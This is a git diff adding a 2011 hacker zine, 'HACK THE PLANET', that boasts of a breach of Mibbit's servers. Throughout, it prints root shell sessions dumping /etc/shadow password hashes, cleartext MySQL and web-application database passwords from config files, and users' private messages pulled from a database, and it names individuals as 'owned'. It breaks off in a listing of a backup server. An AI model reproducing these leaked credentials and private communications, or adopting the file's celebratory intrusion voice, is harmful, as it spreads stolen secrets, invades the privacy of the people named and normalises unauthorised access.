1st import into tree

htp/HTP-2.txt

@@ -0,0 +1,747 @@
+HACK THE PLANET
+
+
+:: Table of Contents ::
+ 0x01 ~ Preface
+ 0x02 ~ tools.mibbit.com
+  - 0x03 ~ PM logs
+ 0x04 ~ status.mibbit.com
+ 0x05 ~ sidewinder.netonecom.net
+ 0x06 ~ d0x
+ 0x07 ~ exit
+
+
+:: 0x01 - Preface :: 
+
+You may have read the about the various attention-whoring skid injections of LulzSec in the news lately, who hasn't? 
+Apparently, anyone can pick up Havij, LFImap, or LOIC and make media headlines today. It seems they have succeeded in 
+defacing the name of the anti-sec movement, turning it into a faux-revolutionary battle cry in the form of #antisec. 
+However, anti-sec is not what it is being portrayed as. In actuality, anti-sec is the practice of keeping one's 
+exploits and hacks to oneself for the good of everyone else (or personal profit, depending on who you ask). LulzSec, I 
+would throw in a note here, but it seems I'm too late, most of you are already raided. To the rest, make your time.
+
+Not on the front page of the latest hacking busts and takedowns, the more skilled among us know not to broadcast our 
+various 0wnages. We silently slip in and sift through large networks. Releases are private. Obviously, when you have a 
+group that comes along such as Lulzsec, the question is not what they will get into, but how long they will last.
+
+More importantly, I would like to establish that the former Scene has very nearly disappeared since the rise of groups 
+like Lulzsec. Blindly exploiting and staging large scale unjustified attacks against arbitrary organizations is not the 
+mentality of hacking. Hacking is about curiousity. Hacking is about information. Attacking government entities so you 
+can give the media your devoid justice statement is not hacking. It's called bullshit. I've seen enough garbage from 
+Lulzsec releases.
+
+Today, we would like to provide the community with a special release, exclusively for all of the skidiots on Mibbit 
+fueling Lulzsec/#antisec efforts. Enjoy.
+
+- HTP
+
+
+targ3t:
+
+-                           Mibbit
+
+0wn3d:
+
+ -               Axod       Azander    Havvy
+ -               Hercule    Joshua     Kitsune
+ -               Molkmin    Pottsi     Sindacious
+
+
+:: 0x02 - 0wnage - tools.mibbit.com ::
+[h () ck ~]$ ssh root () tools mibbit com
+root () tools mibbit com's password: 
+Last login: Fri Aug 12 23:16:22 2011 from [redacted]
+root () tools:~# uname -a
+Linux tools.mibbit.com 2.6.32.16-linode28 #1 SMP Sun Jul 25 21:32:42 UTC 2010 i686 GNU/Linux
+root () tools:~# cat /etc/passwd /etc/shadow
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/bin/sh
+man:x:6:12:man:/var/cache/man:/bin/sh
+lp:x:7:7:lp:/var/spool/lpd:/bin/sh
+mail:x:8:8:mail:/var/mail:/bin/sh
+news:x:9:9:news:/var/spool/news:/bin/sh
+uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
+proxy:x:13:13:proxy:/bin:/bin/sh
+www-data:x:33:33:www-data:/var/www:/bin/sh
+backup:x:34:34:backup:/var/backups:/bin/sh
+list:x:38:38:Mailing List Manager:/var/list:/bin/sh
+irc:x:39:39:ircd:/var/run/ircd:/bin/sh
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
+nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+libuuid:x:100:101::/var/lib/libuuid:/bin/sh
+syslog:x:101:103::/home/syslog:/bin/false
+ntp:x:102:104::/home/ntp:/bin/false
+sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
+wwwadmin:x:1000:1000::/home/wwwadmin:/bin/bash
+mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
+Debian-exim:x:105:107::/var/spool/exim4:/bin/false
+root:$1$6793e8d9$aGW9MH6RaZmSP4Tncpwrb1:14728:0:99999:7:::
+daemon:*:14728:0:99999:7:::
+bin:*:14728:0:99999:7:::
+sys:*:14728:0:99999:7:::
+sync:*:14728:0:99999:7:::
+games:*:14728:0:99999:7:::
+man:*:14728:0:99999:7:::
+lp:*:14728:0:99999:7:::
+mail:*:14728:0:99999:7:::
+news:*:14728:0:99999:7:::
+uucp:*:14728:0:99999:7:::
+proxy:*:14728:0:99999:7:::
+www-data:*:14728:0:99999:7:::
+backup:*:14728:0:99999:7:::
+list:*:14728:0:99999:7:::
+irc:*:14728:0:99999:7:::
+gnats:*:14728:0:99999:7:::
+nobody:*:14728:0:99999:7:::
+libuuid:!:14728:0:99999:7:::
+syslog:*:14728:0:99999:7:::
+ntp:*:14728:0:99999:7:::
+sshd:*:14728:0:99999:7:::
+wwwadmin:$6$.EejimbY$xKAXfpd3nBlNeoQ6pBWBqh673jW2ytSmL5WoUkXaRxadV/fUIM2nQcxm1mGzk1YI9t3yQH8XMzpzSHpNv1jb00:15048:0:99999:7:::
+mysql:!:15048:0:99999:7:::
+Debian-exim:!:15075:0:99999:7:::
+root () tools:~# ps aux | grep log
+root       201  0.0  0.0      0     0 ?        S    Mar15   0:00 [xfslogd/0]
+root       202  0.0  0.0      0     0 ?        S    Mar15   0:00 [xfslogd/1]
+root       203  0.0  0.0      0     0 ?        S    Mar15   0:00 [xfslogd/2]
+root       204  0.0  0.0      0     0 ?        S    Mar15   0:00 [xfslogd/3]
+syslog    9019  0.0  0.2  21200  1288 ?        Sl   Mar15   1:35 rsyslogd -c4
+wwwadmin 18565  0.0  0.6   5056  3360 ?        S    Mar31  22:01 /home/wwwadmin/loggerbot/eggdrop ./logger1
+root () tools:~# ls -al /
+total 96
+drwxr-xr-x  22 root root  4096 Mar 15 22:22 .
+drwxr-xr-x  22 root root  4096 Mar 15 22:22 ..
+drwxrwxrwx  20 root root  4096 Aug  6 23:14 OLD_DATA
+drwxr-xr-x   2 root root  4096 Mar 15 12:19 bin
+drwxr-xr-x   2 root root  4096 Apr 29  2010 boot
+drwxr-xr-x  11 root root 13640 Mar 15 12:20 dev
+drwxr-xr-x  76 root root  4096 Aug 13 01:26 etc
+drwxr-xr-x   3 root root  4096 Mar 15 12:31 home
+drwxr-xr-x  17 root root 12288 Aug  9 00:38 lib
+drwx------   2 root root 16384 Apr 29  2010 lost+found
+drwxr-xr-x   2 root root  4096 Apr 29  2010 media
+drwxr-xr-x   2 root root  4096 Apr 23  2010 mnt
+drwxr-xr-x   2 root root  4096 Apr 29  2010 opt
+dr-xr-xr-x 117 root root     0 Mar 15 12:04 proc
+drwx------   4 root root  4096 Aug 13 02:32 root
+drwxr-xr-x   2 root root  4096 Mar 15 12:20 sbin
+drwxr-xr-x   2 root root  4096 Dec  5  2009 selinux
+drwxr-xr-x   2 root root  4096 Apr 29  2010 srv
+drwxr-xr-x  12 root root     0 Mar 15 12:04 sys
+drwxrwxrwt   4 root root  4096 Aug 12 08:40 tmp
+drwxr-xr-x  11 root root  4096 Aug  9 00:44 usr
+drwxr-xr-x  15 root root  4096 Aug  9 00:44 var
+root () tools:~# ls -al /home
+total 12
+drwxr-xr-x  3 root     root     4096 Mar 15 12:31 .
+drwxr-xr-x 22 root     root     4096 Mar 15 22:22 ..
+drwxr-xr-x  7 wwwadmin wwwadmin 4096 Aug 12 16:13 wwwadmin
+root () tools:~# ls -al /home/wwwadmin
+total 1076
+drwxr-xr-x  7 wwwadmin wwwadmin   4096 Aug 12 16:13 .
+drwxr-xr-x  3 root     root       4096 Mar 15 12:31 ..
+-rw-r--r--  1 wwwadmin wwwadmin   5014 Aug  7 20:51 .bash_history
+-rw-r--r--  1 wwwadmin wwwadmin    220 Apr 19  2010 .bash_logout
+-rw-r--r--  1 wwwadmin wwwadmin   3136 Aug  7 17:39 .bashrc
+drwx------  2 wwwadmin wwwadmin   4096 Mar 15 20:10 .cache
+-rw-r--r--  1 wwwadmin wwwadmin     19 Jan 29  2009 .hercpw
+-rw-r--r--  1 wwwadmin wwwadmin    148 Apr 11  2010 .htpasswd
+-rw-------  1 wwwadmin wwwadmin    177 Aug  6 15:34 .lesshst
+-rw-------  1 wwwadmin wwwadmin    214 Mar 16 20:20 .mysql_history
+-rw-------  1 wwwadmin wwwadmin     55 Mar 16 18:19 .php_history
+-rw-r--r--  1 wwwadmin wwwadmin    700 Mar 15 20:55 .profile
+-rw-r--r--  1 wwwadmin wwwadmin     66 Mar 31 16:37 .selected_editor
+drwx------  2 wwwadmin wwwadmin   4096 Mar 15 20:53 .ssh
+drwxr-xr-x  2 wwwadmin wwwadmin   4096 Mar 15 21:20 .vim
+-rw-------  1 wwwadmin wwwadmin  13346 Aug 12 16:13 .viminfo
+-rw-r--r--  1 wwwadmin wwwadmin   4425 Mar 15 20:53 .vimrc
+-rw-r--r--  1 wwwadmin wwwadmin 993262 Mar 31 14:46 eggdrop1.6.20.tar.bz2
+drwxr-xr-x  6 wwwadmin wwwadmin   4096 Apr 16 15:01 kenneth
+drwxr-xr-x 10 wwwadmin wwwadmin   4096 Aug 13 02:00 loggerbot
+-rw-r--r--  1 wwwadmin wwwadmin     45 Apr  5 20:40 test.php
+root () tools:~# ls -al /OLD_DATA
+total 132
+drwxrwxrwx 20 root root  4096 Aug  6 23:14 .
+drwxr-xr-x 22 root root  4096 Mar 15 22:22 ..
+drwxr-xr-x  2 root root  4096 Mar 15 10:46 bin
+drwxr-xr-x  2 root root  4096 Oct 20  2008 boot
+drwxr-xr-x  4 root root  8192 Mar 15 09:49 dev
+drwxr-xr-x 76 root root  4096 Mar 15 10:46 etc
+drwxr-xr-x  5 root root  4096 Jan 12  2009 home
+drwxr-xr-x 12 root root  8192 Mar 15 10:46 lib
+drwx------  2 root root 16384 Nov 25  2008 lost+found
+drwxr-xr-x  2 root root  4096 Nov 25  2008 media
+drwxr-xr-x  2 root root  4096 Oct 20  2008 mnt
+drwxr-xr-x  2 root root  4096 Nov 25  2008 opt
+drwxr-xr-x  2 root root  4096 Oct 20  2008 proc
+drwxr-xr-x  3 root root  4096 Mar  7 22:29 root
+drwxr-xr-x  2 root root  4096 Mar 15 10:46 sbin
+-rw-------  1 root root 31903 Jan 12  2009 sql0swW3A
+drwxr-xr-x  2 root root  4096 Nov 25  2008 srv
+drwxr-xr-x  2 root root  4096 Oct 14  2008 sys
+drwxrwxrwt  4 root root  4096 Mar 15 09:49 tmp
+drwxr-xr-x 11 root root  4096 Dec  9  2008 usr
+drwxr-xr-x 15 root root  4096 Dec 17  2008 var
+root () tools:~# ls -al /OLD_DATA/home
+total 20
+drwxr-xr-x  5 root     root     4096 Jan 12  2009 .
+drwxrwxrwx 20 root     root     4096 Aug  6 23:14 ..
+drwxr-xr-x 13     1001     1001 4096 Mar 15 10:46 ircadmin
+drwxr-xr-x  4 wwwadmin wwwadmin 4096 Oct 12  2009 mibbit
+drwxr-xr-x  8     1002     1002 4096 Mar 15 09:29 wwwadmin
+root () tools:~# ls -al /OLD_DATA/home/ircadmin/ # ALL YOUR IRCD ARE BELONG TO US
+total 146816
+drwxr-xr-x 13 1001 1001      4096 Mar 15 10:46 .
+drwxr-xr-x  5 root root      4096 Jan 12  2009 ..
+-rw-------  1 1001 1001     14707 Mar 14 23:29 .bash_history
+-rw-r--r--  1 1001 1001       220 May 12  2008 .bash_logout
+-rw-r--r--  1 1001 1001      3115 May 12  2008 .bashrc
+-rw-------  1 1001 1001        41 Jun  1  2010 .lesshst
+-rw-------  1 1001 1001       256 Mar 12 14:44 .nano_history
+-rw-r--r--  1 1001 1001       675 May 12  2008 .profile
+drwxr-xr-x  2 1001 1001      4096 Mar  7 23:44 .ssh
+-rw-------  1 1001 1001       821 May 21  2009 .viminfo
+drwxr-xr-x 13 1001 1001      4096 Jan  5  2010 Unreal3.2.7
+drwx------ 13 1001 1001      4096 Apr 13  2009 Unreal3.2.8
+drwx------ 13 1001 1001      4096 Dec 22  2010 Unreal3.2.8.1
+-rw-r--r--  1 1001 1001   8181760 Sep  9  2009 Unreal3.2.8.1.tar
+-rw-r--r--  1 1001 1001   8181760 Apr  7  2009 Unreal3.2.8.tar
+drwxr-xr-x  7 1001 1001      4096 Feb  3  2009 anope-1.8.0-rc1
+drwxr-xr-x  8 1001 1001      4096 Jan  7  2009 bopm
+drwxr-xr-x  5 1001 1001      4096 Jan  7  2009 bopm-3.1.3
+-rw-------  1 1001 1001      1475 Jul 30  2009 dead.letter
+drwxr-xr-x  2 1001 1001      8192 Mar 12 14:44 dronebl
+drwxr-xr-x  3 1001 1001      4096 May  4  2009 hub
+drwxr-xr-x  9 1001 1001      4096 Mar 15 10:46 infobot-0.45.3
+-rw-r--r--  1 1001 1001        81 Jan 26  2010 irc.us.mibbit.net.txt
+-rw-r--r--  1 1001 1001 132744770 Feb 28  2010 ircd.tgz
+-rw-r--r--  1 1001 1001       623 Oct 27  2009 jim
+-rw-------  1 1001 1001    949701 Feb  8  2010 mbox
+drwxr-xr-x  7 1001 1001      4096 Jan 26  2010 services
+
+:: 0x03 - PM logs - tools.mibbit.com ::
+
+root () tools:~# mysql -u root -ped4e5c6e88e5
+Welcome to the MySQL monitor.  Commands end with ; or \g.
+Your MySQL connection id is 95641
+Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
+Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+mysql> use www;
+Reading table information for completion of table and column names
+You can turn off this feature to get a quicker startup with -A
+Database changed
+mysql> select concat(fromNick,' -> ',toNick,': ',data) from pmlogs;
+ 
+jared -> molkmin: can the admins tell when users PM each other on this network?
+jared -> molkmin: (with mibbit)
+molkmin -> jared: who do you wnat to know is saying what?
+jared -> molkmin: but they don't have to know that :)
+
+            karma motherfuck3r
+
+ 
+molkmin -> alpha: not that I can see 
+molkmin -> alpha: I wasn't watching 
+molkmin -> alpha: it hardly matters :) 
+alpha -> molkmin: just silenced them 
+alpha -> molkmin: :) 
+molkmin -> alpha: everyone in #chat is assholes :) 
+alpha -> molkmin: lol 
+alpha -> molkmin: thanks 
+
+            thX
+
+
+jared -> molkmin: i've seen some scary botnets on dalnet 
+jared -> molkmin: they could knock you off the server in less than a second 
+molkmin -> jared: I've never had that happen yet 
+molkmin -> jared: I have a mac 
+
+            ??
+
+
+jared -> molkmin: VNCing into a linux box 
+jared -> molkmin: with a windows virtualbox guest 
+jared -> molkmin: to use the VPN 
+jared -> molkmin: to connect to a terminal server at work 
+jared -> molkmin: friggin ridiculous 
+molkmin -> jared: get a freaking mac 
+jared -> molkmin: how would that help? 
+
+            ...
+
+
+[h () ck ~]$ wc mibbitpms.out 
+  51610  493903 2955301 mibbitpms.out
+[h () ck ~]$ wc mibbitchanmsgs.out 
+  622607  4558597 32539145 mibbitchanmsgs.out
+
+            f1les @ 0x07 <<<
+
+
+:: 0x04 - status.mibbit.com ::
+[h () ck ~]$ ssh wwwadmin () status mibbit com
+wwwadmin () status mibbit com's password: 
+Last login: Fri Aug 12 21:18:51 2011 from [redacted]
+wwwadmin () status:~$ cat /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/bin/sh
+man:x:6:12:man:/var/cache/man:/bin/sh
+lp:x:7:7:lp:/var/spool/lpd:/bin/sh
+mail:x:8:8:mail:/var/mail:/bin/sh
+news:x:9:9:news:/var/spool/news:/bin/sh
+uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
+proxy:x:13:13:proxy:/bin:/bin/sh
+www-data:x:33:33:www-data:/var/www:/bin/sh
+backup:x:34:34:backup:/var/backups:/bin/sh
+list:x:38:38:Mailing List Manager:/var/list:/bin/sh
+irc:x:39:39:ircd:/var/run/ircd:/bin/sh
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
+nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+libuuid:x:100:101::/var/lib/libuuid:/bin/sh
+sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
+syslog:x:102:103::/home/syslog:/bin/false
+klog:x:103:104::/home/klog:/bin/false
+mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
+mibbit:x:1000:1000::/home/mibbit:/bin/bash
+wwwadmin:x:1001:1001::/home/wwwadmin:/bin/bash
+zfreebies:x:1002:1002::/home/zfreebies:/bin/bash
+smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
+smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
+jimmy:x:1003:1003::/home/jimmy:/bin/bash
+bind:x:107:109::/var/cache/bind:/bin/false
+wwwadmin () status:~$ ls -alt /
+total 92
+drwxrwxrwt  4 root root  4096 Aug 13 07:25 tmp
+drwxr-xr-x 78 root root  4096 Aug 13 01:14 etc
+drwxr-xr-x 21 root root  4096 Jul  7 07:40 .
+drwxr-xr-x 21 root root  4096 Jul  7 07:40 ..
+drwxr-xr-x 11 root root 12760 Jul  7 07:40 dev
+drwxr-xr-x 11 root root     0 Jul  7 07:40 sys
+dr-xr-xr-x 99 root root     0 Jul  7 07:40 proc
+drwxr-xr-x  2 root root  4096 May 29 23:11 bin
+drwxr-xr-x 15 root root 12288 May 29 23:11 lib
+drwx------  3 root root  4096 May 29 23:11 root
+drwxr-xr-x  2 root root  4096 Nov  6  2010 sbin
+drwxr-xr-x  6 root root  4096 Mar  4  2010 home
+drwxr-xr-x 11 root root  4096 Sep 30  2009 usr
+drwxr-xr-x 14 root root  4096 Aug 11  2009 var
+drwxr-xr-x  2 root root  4096 Apr 23  2009 media
+drwxr-xr-x  2 root root  4096 Apr 23  2009 opt
+drwxr-xr-x  2 root root  4096 Apr 23  2009 srv
+drwx------  2 root root 16384 Apr 23  2009 lost+found
+drwxr-xr-x  2 root root  4096 Apr 13  2009 boot
+drwxr-xr-x  2 root root  4096 Apr 13  2009 mnt
+drwxr-xr-x  2 root root  4096 Mar  6  2009 selinux
+wwwadmin () status:~$ ls -alt /home
+total 24
+drwxr-xr-x  6 wwwadmin  wwwadmin  4096 Aug 12 21:44 wwwadmin
+drwxr-xr-x 21 root      root      4096 Jul  7 07:40 ..
+drwxr-xr-x  7 mibbit    mibbit    4096 Jun 29 13:30 mibbit
+drwxr-xr-x  4 zfreebies zfreebies 4096 Apr 29  2010 zfreebies
+drwxr-xr-x  3 jimmy     jimmy     4096 Mar  8  2010 jimmy
+drwxr-xr-x  6 root      root      4096 Mar  4  2010 .
+wwwadmin () status:~$ ls -alt
+total 52
+drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 .
+-rw------- 1 wwwadmin wwwadmin 1979 Aug 12 21:44 .mysql_history
+-rw------- 1 wwwadmin wwwadmin  120 Aug 12 05:15 .nano_history
+drwxrwxrwx 2 wwwadmin wwwadmin 4096 Aug  7 18:29 .ssh
+-rw------- 1 wwwadmin wwwadmin 6566 Aug  7 15:02 .bash_history
+drwxr-xr-x 3 wwwadmin wwwadmin 4096 Jan 26  2011 wiki_new
+drwxr-xr-x 4 wwwadmin wwwadmin 4096 Jan 25  2011 wiki_backup_25Jan
+lrwxrwxrwx 1 root     root       31 Jan 17  2011 blog -> /var/www/blog.mibbit.com/htdocs
+drwxr-xr-x 2 wwwadmin wwwadmin 4096 Dec 10  2010 WP_BACKUP
+drwxr-xr-x 6 root     root     4096 Mar  4  2010 ..
+lrwxrwxrwx 1 wwwadmin wwwadmin   32 Sep 13  2009 wiki -> /var/www/wiki.mibbit.com/htdocs/
+-rw-r--r-- 1 wwwadmin wwwadmin  220 Mar  2  2009 .bash_logout
+-rw-r--r-- 1 wwwadmin wwwadmin 3115 Mar  2  2009 .bashrc
+-rw-r--r-- 1 wwwadmin wwwadmin  675 Mar  2  2009 .profile
+wwwadmin () status:~$ ls -alt /var/www/
+total 56
+drwxr-xr-x  4 root     root     4096 May 12  2010 www.stopitmovies.com
+drwxr-xr-x 13 root     root     4096 May 12  2010 .
+drwxr-xr-x  4 root     root     4096 Mar 24  2010 status.mibbit.com
+drwxr-xr-x  4 root     root     4096 Mar 16  2010 a.mibbit.com
+drwxr-xr-x  6 root     root     4096 Feb 19  2010 blog.mibbit.com
+drwxr-xr-x  4 root     root     4096 Dec 23  2009 adminwiki.mibbit.com
+drwxr-xr-x  4 root     root     4096 Oct 12  2009 www.rollered.com
+drwxr-xr-x  4 root     root     4096 Oct 12  2009 www.wizzig.com
+drwxr-xr-x  4 www-data www-data 4096 Oct 12  2009 www.axod.net
+drwxr-xr-x  5 root     root     4096 Sep 30  2009 www.zfreebies.com
+drwxr-xr-x  5 root     root     4096 Sep 15  2009 forum.zfreebies.co.uk
+drwxrwxr-x  5 www-data www-data 4096 Sep 13  2009 wiki.mibbit.com
+-rw-r--r--  1 root     root       45 Aug 11  2009 index.html
+drwxr-xr-x 14 root     root     4096 Aug 11  2009 ..
+wwwadmin () status:~$ cat /var/www/a.mibbit.com/htdocs/admin/index.php | head -n 3
+<?
+        $sql = @mysql_connect("127.0.0.1", "advertuser", "e5e32f36aa88");
+        @mysql_select_db("adverts", $sql);
+wwwadmin () status:~$ cat /var/www/a.mibbit.com/htdocs/sessionError.php | head -n 3
+<?
+
+    $sql = @mysql_connect("127.0.0.1", "root", "5068c8055ffc");
+wwwadmin () status:~$ ls -alt /var/www/blog.mibbit.com/htdocs
+total 308
+drwxr-xr-x 5 wwwadmin wwwadmin  4096 Nov 15  2010 .
+-rw-r--r-- 1 wwwadmin www-data   655 Nov 15  2010 favicon.ico
+drwxr-xr-x 5 wwwadmin www-data  4096 Feb 23  2010 wp-content
+-rw-r--r-- 1 wwwadmin www-data  1548 Feb 19  2010 wp-config.php
+-rw-r--r-- 1 wwwadmin www-data 93445 Feb 19  2010 xmlrpc.php
+-rw-r--r-- 1 wwwadmin www-data 23097 Feb 19  2010 wp-settings.php
+-rw-r--r-- 1 wwwadmin www-data  3693 Feb 19  2010 wp-trackback.php
+-rw-r--r-- 1 wwwadmin www-data   218 Feb 19  2010 wp-rss.php
+-rw-r--r-- 1 wwwadmin www-data   220 Feb 19  2010 wp-rss2.php
+-rw-r--r-- 1 wwwadmin www-data  7578 Feb 19  2010 wp-mail.php
+-rw-r--r-- 1 wwwadmin www-data   487 Feb 19  2010 wp-pass.php
+-rw-r--r-- 1 wwwadmin www-data   218 Feb 19  2010 wp-rdf.php
+-rw-r--r-- 1 wwwadmin www-data   316 Feb 19  2010 wp-register.php
+-rw-r--r-- 1 wwwadmin www-data  2341 Feb 19  2010 wp-load.php
+-rw-r--r-- 1 wwwadmin www-data 22721 Feb 19  2010 wp-login.php
+drwxr-xr-x 6 wwwadmin www-data  4096 Feb 19  2010 wp-includes
+-rw-r--r-- 1 wwwadmin www-data  1946 Feb 19  2010 wp-links-opml.php
+-rw-r--r-- 1 wwwadmin www-data   220 Feb 19  2010 wp-feed.php
+-rw-r--r-- 1 wwwadmin www-data  1253 Feb 19  2010 wp-cron.php
+-rw-r--r-- 1 wwwadmin www-data   238 Feb 19  2010 wp-commentsrss2.php
+-rw-r--r-- 1 wwwadmin www-data  2616 Feb 19  2010 wp-config-sample.php
+-rw-r--r-- 1 wwwadmin www-data 40400 Feb 19  2010 wp-app.php
+-rw-r--r-- 1 wwwadmin www-data   220 Feb 19  2010 wp-atom.php
+-rw-r--r-- 1 wwwadmin www-data   274 Feb 19  2010 wp-blog-header.php
+-rw-r--r-- 1 wwwadmin www-data  3928 Feb 19  2010 wp-comments-post.php
+drwxr-xr-x 8 wwwadmin www-data  4096 Feb 19  2010 wp-admin
+-rw-r--r-- 1 wwwadmin www-data 15410 Feb 19  2010 license.txt
+-rw-r--r-- 1 wwwadmin www-data  7644 Feb 19  2010 readme.html
+-rw-r--r-- 1 wwwadmin www-data   397 Feb 19  2010 index.php
+drwxr-xr-x 6 root     root      4096 Feb 19  2010 ..
+wwwadmin () status:~$ cat /var/www/blog.mibbit.com/htdocs/wp-config.php | head -n 8
+<?php
+// ** MySQL settings ** //
+define('DB_NAME', 'wpblog');    // The name of the database
+define('DB_USER', 'wpuser');     // Your MySQL username
+define('DB_PASSWORD', '13c3cada3921'); // ...and password
+define('DB_HOST', 'localhost');    // 99% chance you won't need to change this value
+define('DB_CHARSET', 'utf8');
+define('DB_COLLATE', '');
+wwwadmin () status:~$ ls -alt /var/www/wiki.mibbit.com/htdocs/
+total 720
+-rw-rw-r--  1 www-data www-data   6960 Mar 21 12:46 LocalSettings.php
+drwxrwxr-x  9 www-data www-data   4096 Mar 21 12:41 extensions
+drwxr-xr-x  2 wwwadmin wwwadmin   4096 Jan 26  2011 SpamBlacklist
+drwxrwxr-x 17 www-data www-data   4096 Jan 26  2011 .
+drwxrwxr-x 22 www-data www-data   4096 Jan 26  2011 images
+drwxrwxr-x  2 www-data www-data   4096 Jan 26  2011 bin
+drwxrwxr-x  2 www-data www-data   4096 Jan 26  2011 config
+drwxrwxr-x  4 www-data www-data   4096 Jan 26  2011 docs
+drwxrwxr-x 17 www-data www-data   4096 Jan 26  2011 includes
+drwxrwxr-x  4 www-data www-data   4096 Jan 26  2011 languages
+drwxrwxr-x 13 www-data www-data  12288 Jan 26  2011 maintenance
+drwxrwxr-x  2 www-data www-data   4096 Jan 26  2011 math
+drwxrwxr-x  2 www-data www-data   4096 Jan 26  2011 serialized
+drwxrwxr-x 10 www-data www-data   4096 Jan 26  2011 skins
+drwxr-xr-x  2 wwwadmin wwwadmin   4096 Jan  4  2011 cache
+-rw-r--r--  1 wwwadmin wwwadmin  59433 Jan  4  2011 RELEASE-NOTES
+-rw-r--r--  1 wwwadmin wwwadmin   2090 Jan  4  2011 CREDITS
+-rw-r--r--  1 wwwadmin wwwadmin   8821 Jan  4  2011 profileinfo.php
+-rw-rw-r--  1 root     root        655 Nov 15  2010 favicon.ico
+-rw-r--r--  1 wwwadmin wwwadmin  13307 Mar 25  2010 UPGRADE
+-rw-r--r--  1 wwwadmin wwwadmin 392287 Mar 12  2010 HISTORY
+-rw-r--r--  1 wwwadmin wwwadmin   4905 Mar  8  2010 thumb.php
+-rw-r--r--  1 wwwadmin wwwadmin   4707 Feb 15  2010 api.php
+-rw-r--r--  1 wwwadmin wwwadmin    174 Feb  3  2010 php5.php5
+-rw-r--r--  1 wwwadmin wwwadmin     89 Feb  3  2010 redirect.phtml
+-rw-r--r--  1 wwwadmin wwwadmin     86 Feb  3  2010 wiki.phtml
+-rw-r--r--  1 wwwadmin wwwadmin   4329 Jan  1  2010 index.php
+-rw-r--r--  1 wwwadmin wwwadmin   4031 Oct 14  2009 img_auth.php
+-rw-rw-r--  1 www-data www-data   9416 Sep 13  2009 mibbit.png
+-rw-rw-r--  1 www-data www-data   1049 Sep 13  2009 AdminSettings.php
+drwxrwxr-x  5 www-data www-data   4096 Sep 13  2009 ..
+-rw-r--r--  1 wwwadmin wwwadmin     76 Jul 27  2009 FAQ
+drwxrwxr-x  4 www-data www-data   4096 Jul 13  2009 t
+drwxrwxr-x  2 www-data www-data   4096 Jul 13  2009 tests
+-rw-r--r--  1 wwwadmin wwwadmin    648 May  7  2009 StartProfiler.sample
+-rw-rw-r--  1 www-data www-data   3952 Mar 21  2009 install-utils.inc
+-rw-r--r--  1 wwwadmin wwwadmin   3054 Mar 21  2009 opensearch_desc.php
+-rw-r--r--  1 wwwadmin wwwadmin    383 Mar 21  2009 redirect.php
+-rw-r--r--  1 wwwadmin wwwadmin     32 Mar 16  2009 trackback.php5
+-rw-rw-r--  1 www-data www-data    603 Jan  7  2009 StartProfiler.php
+-rw-r--r--  1 wwwadmin wwwadmin   3649 Nov 11  2008 README
+-rw-r--r--  1 wwwadmin wwwadmin   1347 Nov  5  2008 trackback.php
+-rw-r--r--  1 wwwadmin wwwadmin   4138 Apr 18  2008 INSTALL
+-rw-rw-r--  1 www-data www-data    618 Apr 11  2008 Makefile
+-rw-r--r--  1 wwwadmin wwwadmin     39 Mar  3  2008 opensearch_desc.php5
+-rw-r--r--  1 wwwadmin wwwadmin     25 Feb  4  2008 api.php5
+-rw-r--r--  1 wwwadmin wwwadmin     31 Feb  4  2008 img_auth.php5
+-rw-r--r--  1 wwwadmin wwwadmin     28 Feb  4  2008 index.php5
+-rw-r--r--  1 wwwadmin wwwadmin     31 Feb  4  2008 redirect.php5
+-rw-r--r--  1 wwwadmin wwwadmin     29 Feb  4  2008 thumb.php5
+-rw-r--r--  1 wwwadmin wwwadmin  17997 Apr  5  2006 COPYING
+wwwadmin () status:~$ cat /var/www/wiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
+
+$wgDBtype           = "mysql";
+$wgDBserver         = "localhost";
+$wgDBname           = "wikidb";
+$wgDBuser           = "wikiuser";
+$wgDBpassword       = "a69e74574db6";
+$wgDBport           = "5432";
+$wgDBprefix         = "";
+$wgDBadminuser      = "wikiuser";
+$wgDBadminpassword  = "a69e74574db6";
+
+# Schemas for Postgres
+$wgDBmwschema       = "mediawiki";
+$wgDBts2schema      = "public";
+wwwadmin () status:~$ cat /var/www/adminwiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
+## Database settings
+$wgDBtype           = "mysql";
+$wgDBserver         = "localhost";
+$wgDBname           = "wikiadmindb";
+$wgDBuser           = "wikiadminuser";
+$wgDBpassword       = "fe102b0d7793";
+
+# MySQL specific settings
+$wgDBprefix         = "";
+
+# MySQL table options to use during installation or update
+wwwadmin () status:~$ exit
+Connection to status.mibbit.com closed.
+
+
+:: 0x05 - sidewinder.netonecom.net ::
+backup () sidewinder ~> ls -al # read world backups of all servers with /etc/shadow ROFL
+total 596
+drwxr-xr-x 16 backup root     432 2011-08-12 18:52 .
+drwxr-xr-x 26 root   root     632 2011-05-12 14:12 ..
+drwxr-xr-x  2 backup users   1344 2009-08-27 10:44 amram
+drwxr-xr-x  2 root   root  587920 2011-08-13 12:37 awstats
+-rw-------  1 backup  1452     17 2006-09-18 14:47 .bash_history
